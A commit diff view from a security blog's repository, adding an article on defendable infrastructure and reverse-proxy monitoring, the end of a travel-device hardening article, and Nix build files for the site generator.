* Based on the Linux-kernel, which means it is different from
|
||||||
|
Windows and may require some extra effort from a threat actor
|
||||||
|
* A lot of work has gone in to the user interface in ChromeOS, so
|
||||||
|
it will feel familiar and intuitive to users
|
||||||
|
* ChromeOS has a lot of security features built-in [15], such as:
|
||||||
|
Secure Boot, Security Key login and so on.
|
||||||
|
|
||||||
|
G Suite will help you a little bit on the way when it comes to
|
||||||
|
configuration control. However, it requires some client-side
|
||||||
|
configuration.
|
||||||
|
|
||||||
|
The client side consists of components. I chose to model these as
|
||||||
|
five layers:
|
||||||
|
|
||||||
|
The Traveller. The most important asset on the travel is most
|
||||||
|
likely your human traveller. This asset will have some values
|
||||||
|
assigned to it, such as security keys, credentials and his own
|
||||||
|
knowledge. Anonymise information stored here. In other words,
|
||||||
|
make sure to use an identifier and not the travellers real name.
|
||||||
|
|
||||||
|
Device and information. When selecting devices and putting
|
||||||
|
information on it you have entered the device and information
|
||||||
|
exposure layer. This will typically consist of all hardware
|
||||||
|
peripherals, such as cameras, and content such as calls made from
|
||||||
|
a handset. Other things to consider here for ChromeOS is deploying
|
||||||
|
PGP and its keys with Mailvelope and Office from Google Play
|
||||||
|
Store.
|
||||||
|
|
||||||
|
Content. It was actually kind of interesting to model this from an
|
||||||
|
iOS and ChromeOS perspective, because ChromeOS keeps most of its
|
||||||
|
applications in the browser while iOS has native apps on line with
|
||||||
|
Chrome. This again means that the exposure surface of ChromeOS is
|
||||||
|
more uniform than on iOS.
|
||||||
|
|
||||||
|
Native applications. This is the actual applications installed in
|
||||||
|
the operating system directly. For iOS this has larger exposure
|
||||||
|
with native applications for e.g. communications, while on
|
||||||
|
ChromeOS you will basically only install an SFTP plugin to the
|
||||||
|
file system and use Chrome for a travel.
|
||||||
|
|
||||||
|
Transport. When travelling to a hostile environment, tunnel all
|
||||||
|
communications to and from the system as far as possible. Both iOS
|
||||||
|
and ChromeOS has sufficient mechanisms here as we reviewed in the
|
||||||
|
previous section. For encryption keys:
|
||||||
|
|
||||||
|
1. Transfer encryption keys stored in the ``.p12`` file and the
|
||||||
|
configuration to the Chromebook
|
||||||
|
2. Install encryption keys in
|
||||||
|
``chrome://settings/certificates``. Use the "Import and Bind"
|
||||||
|
option to install the certificate to TPM
|
||||||
|
2. Import the VPN configuration (ONC) in
|
||||||
|
``chrome://net-internals/#chromeos``
|
||||||
|
|
||||||
|
That is basically it.
|
||||||
|
|
||||||
|
## Conclusion
|
||||||
|
|
||||||
|
The art of balancing threat resiliency, usability and cost is an
|
||||||
|
intriguing problem.
|
||||||
|
|
||||||
|
The technology out there, presented in this article, is in no way
|
||||||
|
designed to survive in hostile environments when considering the
|
||||||
|
capabilities of nation state threat actors. Fundamental security
|
||||||
|
mechanisms are lacking in this regard, and only companies like
|
||||||
|
Microsoft, Google and Apple can provide the basis to change
|
||||||
|
those. We can however slow these actors down considerably.
|
||||||
|
|
||||||
|
An important aspect to consider, in order to compensate for the
|
||||||
|
above weaknesses, is that organisations needs to handle these
|
||||||
|
problems on an operational and strategic level as well.
|
||||||
|
|
||||||
|
Using cloud environments are a solid choice for travel. However,
|
||||||
|
when considering threat actors that are able to gain access to the
|
||||||
|
hosts of those environments they are not sufficient. To solve
|
||||||
|
this, the most valuable services may be moved in-house or to a
|
||||||
|
hardened cloud environment. End-to-end encryption is also required
|
||||||
|
when using cloud services, such as when using the included inbox
|
||||||
|
of G Suite.
|
||||||
|
|
||||||
|
Please keep in mind that The Tactical Traveler Protection Model is
|
||||||
|
a core model. This article does not cover every aspect. An
|
||||||
|
example of such is encryption and protection of external
|
||||||
|
peripherals and memory devices and operational and strategic
|
||||||
|
considerations.
|
||||||
|
|
||||||
|
Organisations have yet to prove a working model resilient to
|
||||||
|
capable adversaries. Hopefully this article will be a foundation
|
||||||
|
to discuss variations and weaknesses in the community.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[1] https://motherboard.vice.com/en_us/article/a3q374/hacker-bios-firmware-backdoor-evil-maid-attack-laptop-5-minutes
|
||||||
|
|
||||||
|
[2] https://mitre.github.io/attack-navigator/enterprise/
|
||||||
|
|
||||||
|
[3] https://attack.mitre.org/wiki/Initial_Access
|
||||||
|
|
||||||
|
[4] https://github.com/bau-sec/ansible-openvpn-hardened
|
||||||
|
|
||||||
|
[5] https://github.com/trailofbits/algo
|
||||||
|
|
||||||
|
[6] https://zeltser.com/deploy-algo-vpn-digital-ocean/
|
||||||
|
|
||||||
|
[7] https://www.chromium.org/chromium-os/chromiumos-design-docs/open-network-configuration
|
||||||
|
|
||||||
|
[8] https://gist.github.com/tommyskg/6d0eeecc5bab65a49d72f5b16e086976
|
||||||
|
|
||||||
|
[9] https://chromium.googlesource.com/chromium/src/+/32352ad08ee673a4d43e8593ce988b224f6482d3/chromeos/test/data/network
|
||||||
|
|
||||||
|
[10] https://github.com/johanmeiring/ansible-sftp
|
||||||
|
|
||||||
|
[11] https://secdiary.com/2018-07-11-matrix.html
|
||||||
|
|
||||||
|
[12] https://krebsonsecurity.com/2018/07/google-security-keys-neutralized-employee-phishing/
|
||||||
|
|
||||||
|
[13] https://www.yubico.com/product/yubikey-4-series/#yubikey-4c
|
||||||
|
|
||||||
|
[14] https://ftsafe.com/onlinestore/product?id=3
|
||||||
|
|
||||||
|
[15] http://dhanus.mit.edu/docs/ChromeOSSecurity.pdf
|
||||||
|
|
222
data/vantage.md
Normal file
222
data/vantage.md
Normal file
|
@ -0,0 +1,222 @@
|
||||||
|
## Key Takeaways
|
||||||
|
|
||||||
|
* Monitoring the technology infrastructure is a key element for
|
||||||
|
situational awareness in both security and IT operations.
|
||||||
|
* A 2020 infrastructure should use a modern application layer
|
||||||
|
reverse proxy such as Pomerium in front of all services. Leave
|
||||||
|
all clients outside.
|
||||||
|
* The threat landscape should be the focus when shaping a
|
||||||
|
defendable infrastructure.
|
||||||
|
|
||||||
|
<small><i>Disclaimer: If you have outsourced all your equipment
|
||||||
|
and information to "the cloud", this post is a sanity check of the
|
||||||
|
relationship with your vendor. The primary audience of this post
|
||||||
|
is everyone willing to invest in people and knowledge to provide a
|
||||||
|
best possible defense for their people and processes, and the
|
||||||
|
technology supporting them.</i></small>
|
||||||
|
|
||||||
|
## Introduction
|
||||||
|
|
||||||
|
I cannot start to imagine how many times Sun Tzu must have been
|
||||||
|
quoted in board rooms around the world:
|
||||||
|
|
||||||
|
> If you know the enemy and know yourself, you need not fear the
|
||||||
|
> result of a hundred battles. If you know yourself but not the
|
||||||
|
> enemy, for every victory gained you will also suffer a
|
||||||
|
> defeat. If you know neither the enemy nor yourself, you will
|
||||||
|
> succumb in every battle.
|
||||||
|
|
||||||
|
However much repeated, the message has not come across. Why is
|
||||||
|
that? Because this is a hard problem to solve. It is in the
|
||||||
|
intersection between people as a culture and technology.
|
||||||
|
|
||||||
|
If all used reverse proxies in a sensible way I would probably
|
||||||
|
have a lot less to do at work. Time and time again it turns out
|
||||||
|
that organisations do not have configuration control over their
|
||||||
|
applications and infrastructure, and the reverse proxy is a
|
||||||
|
central building block in gaining it. To an extent everything is
|
||||||
|
about logs and traceability when an incident occurs.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
## Beyondcorp and The Defendable Infrastructure
|
||||||
|
|
||||||
|
The lucky part of this hard-to-solve problem is that Google has
|
||||||
|
already prescribed one good solution in its Beyondcorp whitepapers
|
||||||
|
[1].
|
||||||
|
|
||||||
|
But this was in some ways described in the Norwegian Armed Forces
|
||||||
|
before that in its five architecture principles for a defendable
|
||||||
|
infrastructure. These were published by its former Head of Section
|
||||||
|
Critical Infrastructure Protection Centre [2]:
|
||||||
|
|
||||||
|
1. Monitor the network for situational awareness
|
||||||
|
2. A defender must be able to shape the battleground to have
|
||||||
|
freedom of movement and to limit the opponent's freedom of
|
||||||
|
movement
|
||||||
|
3. Update services to limit vulnerability exposure
|
||||||
|
4. Minimize the infrastructure to limit the attack
|
||||||
|
surface
|
||||||
|
5. Traceability is important to analyze what happened
|
||||||
|
|
||||||
|
I know that Richard Bejtlich was an inspiration for the defendable
|
||||||
|
infrastructure principles, so the books written by him is relevant
|
||||||
|
[4,5].
|
||||||
|
|
||||||
|
Defendable infrastructure is a good term, and also used in a 2019
|
||||||
|
Lockheed article which defines it well [3]:
|
||||||
|
|
||||||
|
> Classical security engineering and architecture has been trying
|
||||||
|
> to solve the wrong problem. It is not sufficient to try to build
|
||||||
|
> hardened systems; instead we must build systems that are
|
||||||
|
> defendable. A system’s requirements, design, or test results can’t
|
||||||
|
> be declared as "secure." Rather, it is a combination of how the
|
||||||
|
> system is designed, built, operated, and defended that ultimately
|
||||||
|
> protects the system and its assets over time. Because adversaries
|
||||||
|
> adapt their own techniques based on changing objectives and
|
||||||
|
> opportunities, systems and enterprises must be actively defended.
|
||||||
|
|
||||||
|
The development of these architecture principles happened before
|
||||||
|
2010, so the question remains how they apply in 2020. We may get
|
||||||
|
back to the other principles in later posts, but the rest of this
|
||||||
|
article will focus on monitoring in a 2020-perspective.
|
||||||
|
|
||||||
|
## Monitoring - a Central Vantage Point
|
||||||
|
|
||||||
|
One thing that has developed since 2010 is our understanding of
|
||||||
|
positioning monitoring capabilities and the more mainstream
|
||||||
|
possibility of detection on endpoints. The historical focus of
|
||||||
|
mature teams was primarily on the network layer. While the network
|
||||||
|
layer is still important as an objective point of observation the
|
||||||
|
application layer has received more attention. The reason for it
|
||||||
|
is the acceptance that often it is were exploitation happens and
|
||||||
|
the capabilities as commercial products has emerged.
|
||||||
|
|
||||||
|
With that in mind a shift in the understanding of a best practice
|
||||||
|
of positioning reverse proxies has occured as well. While the
|
||||||
|
previous recommendation was to think: defend inside-out. The focus
|
||||||
|
is now to defend outside-in.
|
||||||
|
|
||||||
|
The meaning of defending outside-in, is to take control of what
|
||||||
|
can be controlled: the application infrastructure. In all
|
||||||
|
practicality this means to position the reverse proxy in front of
|
||||||
|
your server segment instead of the whole network, including
|
||||||
|
clients.
|
||||||
|
|
||||||
|
|
||||||
|
[ Application A ]
|
||||||
|
[ Client on-prem ] |
|
||||||
|
] ---> [ Reverse proxy ] ---> [ App gateway ]
|
||||||
|
[ Client abroad ] ^ |
|
||||||
|
risk assessment [ Application B ]
|
||||||
|
|
||||||
|
|
||||||
|
Previously, by some reason, we put the "client on-prem" on the
|
||||||
|
other side of the reverse proxy, because we believed we could
|
||||||
|
control what the user was doing. Today, we know better. This is
|
||||||
|
not a trust issue, it is a matter of prioritizing based on the
|
||||||
|
asset value and the defending capacity.
|
||||||
|
|
||||||
|
A reverse proxy is also a central vantage point of your
|
||||||
|
infrastructure. In a nutshell if you are good detecting security
|
||||||
|
incidents at this point, you are in a good position to have
|
||||||
|
freedom of movement - such as channeling your opponent.
|
||||||
|
|
||||||
|
The modern reverse proxy have two integration capabilitites that
|
||||||
|
legacy proxies do not:
|
||||||
|
|
||||||
|
* Single sign-on (SSO), which provides strong authentication and
|
||||||
|
good identity management
|
||||||
|
* Access control logic (Google calls this the access control
|
||||||
|
engine)
|
||||||
|
|
||||||
|
In fact, Google in 2013 stated it uses 120 variables for a risk
|
||||||
|
assessment in its access control logic for Gmail [6]. In
|
||||||
|
comparison most organisations today use three: username, password
|
||||||
|
and in half the instances a token.
|
||||||
|
|
||||||
|
> Every time you sign in to Google, whether via your web browser
|
||||||
|
> once a month or an email program that checks for new mail every
|
||||||
|
> five minutes, our system performs a complex risk analysis to
|
||||||
|
> determine how likely it is that the sign-in really comes from
|
||||||
|
> you. In fact, there are more than 120 variables that can factor
|
||||||
|
> into how a decision is made.
|
||||||
|
|
||||||
|
I imagine that Google uses the following factors for comparison to
|
||||||
|
the sole username/password approach (they state some of these in
|
||||||
|
their article):
|
||||||
|
|
||||||
|
- Geo-location with an algoritmic score of destination of last
|
||||||
|
login to current location was part of this. The k-means distance
|
||||||
|
could be a good fit.
|
||||||
|
- Source ASN risk score
|
||||||
|
- Asset subject to access
|
||||||
|
- User role scored against asset subject to access
|
||||||
|
- Device state (updated, antivirus installed and so on)
|
||||||
|
- Previous usage patterns, like time of day
|
||||||
|
- Other information about the behavioural patterns of relevant threats
|
||||||
|
|
||||||
|
Another nice feature of a reverse proxy setup this way is that it
|
||||||
|
minimizes the exposure and gives defenders the possibility to
|
||||||
|
route traffic the way they see fit. For instance, it would be hard
|
||||||
|
for an attacker to differentiate between a honeypot and a
|
||||||
|
production system in the first place. One could also challenge the
|
||||||
|
user in cases where in doubt, instead of plainly denying access as
|
||||||
|
is sometimes done.
|
||||||
|
|
||||||
|
One challenge is what protocols need support. The two clear ones
|
||||||
|
are:
|
||||||
|
|
||||||
|
* HTTP
|
||||||
|
* SSH
|
||||||
|
* Application gateways between micro-segments
|
||||||
|
|
||||||
|
I have scoped out the details of micro-segmentation from this
|
||||||
|
post. Micro-segmentation is the basic idea of creating a fine mesh
|
||||||
|
of network segments in the infrastructure so that no asset can
|
||||||
|
communicate with another by default. The rest is then routed
|
||||||
|
through e.g. a gateway such as Pomerium, or in high-performance
|
||||||
|
cases an application gateway - which may be a gateway for a
|
||||||
|
specific binary protocol. The reason is control of all activity
|
||||||
|
between services, being able to shape and deny access in the
|
||||||
|
terrain.
|
||||||
|
|
||||||
|
Even though this post is not about implementation I will leave you
|
||||||
|
with some examples of good open source starting points: Pomerium
|
||||||
|
is an reverse proxy with the SSO-capability, and the default
|
||||||
|
capabilities of SSH takes you far (ssh-ca and JumpHost).
|
||||||
|
|
||||||
|
-----------> [ syslog server ] <------------
|
||||||
|
| | |
|
||||||
|
| | |
|
||||||
|
o | | |
|
||||||
|
/|\ [ Client ] -------> [ example.com ] <-----> [ app001.example.com ]
|
||||||
|
/ \ | https - pomerium |
|
||||||
|
| | - SSH JumpHost |
|
||||||
|
| | |
|
||||||
|
| | |
|
||||||
|
[ HIDS ] |-------------------> [ NIDS ]
|
||||||
|
|
||||||
|
Figure 1: Conceptual Defendable Infrastructure Overview
|
||||||
|
|
||||||
|
|
||||||
|
Now that a checkpoint is establish in front of the infrastructure,
|
||||||
|
the rest is a matter of traceability, taking the time to
|
||||||
|
understand the data to gain insight and finally develop and
|
||||||
|
implement tactics against your opponents.
|
||||||
|
|
||||||
|
|
||||||
|
Until next time.
|
||||||
|
|
||||||
|
|
||||||
|
[1] https://cloud.google.com/beyondcorp
|
||||||
|
[2]
|
||||||
|
https://norcydef.blogspot.com/2013/03/tg13-forsvarbar-informasjonsinfrastrukt.html
|
||||||
|
[3]
|
||||||
|
https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/LM-White-Paper-Defendable-Architectures.pdf
|
||||||
|
[4] Tao of Network Security Monitoring, The: Beyond Intrusion
|
||||||
|
Detection
|
||||||
|
[5] Extrusion Detection: Security Monitoring for Internal
|
||||||
|
Intrusions
|
||||||
|
[6]
|
||||||
|
https://blog.google/topics/safety-security/an-update-on-our-war-against-account/
|
77
flake.lock
Normal file
77
flake.lock
Normal file
|
@ -0,0 +1,77 @@
|
||||||
|
{
|
||||||
|
"nodes": {
|
||||||
|
"cl-nix-lite": {
|
||||||
|
"locked": {
|
||||||
|
"lastModified": 1721009305,
|
||||||
|
"narHash": "sha256-GtVd8VmPZB+J64VCf26yLbFUFRT1mdpzC8ylAHMIJoo=",
|
||||||
|
"owner": "hraban",
|
||||||
|
"repo": "cl-nix-lite",
|
||||||
|
"rev": "dc2793ec716b294739dabd6d99cc61543e6cd149",
|
||||||
|
"type": "github"
|
||||||
|
},
|
||||||
|
"original": {
|
||||||
|
"owner": "hraban",
|
||||||
|
"repo": "cl-nix-lite",
|
||||||
|
"type": "github"
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"flake-utils": {
|
||||||
|
"inputs": {
|
||||||
|
"systems": "systems"
|
||||||
|
},
|
||||||
|
"locked": {
|
||||||
|
"lastModified": 1710146030,
|
||||||
|
"narHash": "sha256-SZ5L6eA7HJ/nmkzGG7/ISclqe6oZdOZTNoesiInkXPQ=",
|
||||||
|
"owner": "numtide",
|
||||||
|
"repo": "flake-utils",
|
||||||
|
"rev": "b1d9ab70662946ef0850d488da1c9019f3a9752a",
|
||||||
|
"type": "github"
|
||||||
|
},
|
||||||
|
"original": {
|
||||||
|
"owner": "numtide",
|
||||||
|
"repo": "flake-utils",
|
||||||
|
"type": "github"
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"nixpkgs": {
|
||||||
|
"locked": {
|
||||||
|
"lastModified": 1722791413,
|
||||||
|
"narHash": "sha256-rCTrlCWvHzMCNcKxPE3Z/mMK2gDZ+BvvpEVyRM4tKmU=",
|
||||||
|
"owner": "NixOS",
|
||||||
|
"repo": "nixpkgs",
|
||||||
|
"rev": "8b5b6723aca5a51edf075936439d9cd3947b7b2c",
|
||||||
|
"type": "github"
|
||||||
|
},
|
||||||
|
"original": {
|
||||||
|
"owner": "NixOS",
|
||||||
|
"ref": "nixos-24.05",
|
||||||
|
"repo": "nixpkgs",
|
||||||
|
"type": "github"
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"root": {
|
||||||
|
"inputs": {
|
||||||
|
"cl-nix-lite": "cl-nix-lite",
|
||||||
|
"flake-utils": "flake-utils",
|
||||||
|
"nixpkgs": "nixpkgs"
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"systems": {
|
||||||
|
"locked": {
|
||||||
|
"lastModified": 1681028828,
|
||||||
|
"narHash": "sha256-Vy1rq5AaRuLzOxct8nz4T6wlgyUR7zLU309k9mBC768=",
|
||||||
|
"owner": "nix-systems",
|
||||||
|
"repo": "default",
|
||||||
|
"rev": "da67096a3b9bf56a91d16901293e51ba5b49a27e",
|
||||||
|
"type": "github"
|
||||||
|
},
|
||||||
|
"original": {
|
||||||
|
"owner": "nix-systems",
|
||||||
|
"repo": "default",
|
||||||
|
"type": "github"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"root": "root",
|
||||||
|
"version": 7
|
||||||
|
}
|
58
flake.nix
58
flake.nix
|
@ -13,17 +13,57 @@
|
||||||
pkgs = nixpkgs.legacyPackages.${system}.extend cl-nix-lite.overlays.default;
|
pkgs = nixpkgs.legacyPackages.${system}.extend cl-nix-lite.overlays.default;
|
||||||
in
|
in
|
||||||
{
|
{
|
||||||
|
packages = {
|
||||||
defaultPackage.x86_64-linux =
|
ecl = with pkgs.lispPackagesLiteFor pkgs.ecl; lispDerivation {
|
||||||
# Notice the reference to nixpkgs here.
|
name = "thoughts";
|
||||||
with import nixpkgs { system = "x86_64-linux"; };
|
lispSystem = "thoughts";
|
||||||
stdenv.mkDerivation {
|
lispDependencies = [
|
||||||
name = "hello";
|
asdf
|
||||||
src = self;
|
arrow-macros
|
||||||
buildPhase = "gcc -o hello ./hello.c";
|
];
|
||||||
installPhase = "mkdir -p $out/bin; install -t $out/bin hello";
|
src = pkgs.lib.cleanSource ./generator.lisp;
|
||||||
|
meta = {
|
||||||
|
license = pkgs.lib.licenses.agpl3Only;
|
||||||
};
|
};
|
||||||
|
|
||||||
|
buildInputs = [
|
||||||
|
pkgs.ecl
|
||||||
|
pkgs.git
|
||||||
|
pkgs.gnumake
|
||||||
|
pkgs.asdf
|
||||||
|
pkgs.multimarkdown
|
||||||
|
];
|
||||||
|
|
||||||
|
phases = [ "unpackPhase" "installPhase" "cleanupPhase" ];
|
||||||
|
|
||||||
|
unpackPhase = ''
|
||||||
|
mkdir -p $TMPDIR
|
||||||
|
cp ${./generator.lisp} $TMPDIR/generator.lisp
|
||||||
|
mkdir -p $TMPDIR/data
|
||||||
|
cp -r ${toString ./data}/* $TMPDIR/data/
|
||||||
|
mkdir -p $TMPDIR/templates
|
||||||
|
cp -r ${toString ./templates}/* $TMPDIR/templates/
|
||||||
|
mkdir -p $TMPDIR/static
|
||||||
|
cp -r ${toString ./static}/* $TMPDIR/static/
|
||||||
|
'';
|
||||||
|
|
||||||
|
installPhase = ''
|
||||||
|
mkdir -p $out/html
|
||||||
|
mkdir -p $out/gemini
|
||||||
|
mkdir -p $TMPDIR/output/gemini/articles
|
||||||
|
mkdir -p $TMPDIR/output/html
|
||||||
|
mkdir -p $TMPDIR/temp/data
|
||||||
|
cd $TMPDIR
|
||||||
|
ecl --load $TMPDIR/generator.lisp
|
||||||
|
cp -r $TMPDIR/output/html/* $out/html/
|
||||||
|
cp -r $TMPDIR/output/gemini/* $out/gemini/
|
||||||
|
cp -r $TMPDIR $out/tmpdir
|
||||||
|
'';
|
||||||
|
|
||||||
|
cleanupPhase = ''
|
||||||
|
rm -rf $TMPDIR/temp
|
||||||
|
'';
|
||||||
|
};
|
||||||
};
|
};
|
||||||
|
|
||||||
devShell = pkgs.mkShell {
|
devShell = pkgs.mkShell {
|
||||||
|
|
Loading…
Reference in a new issue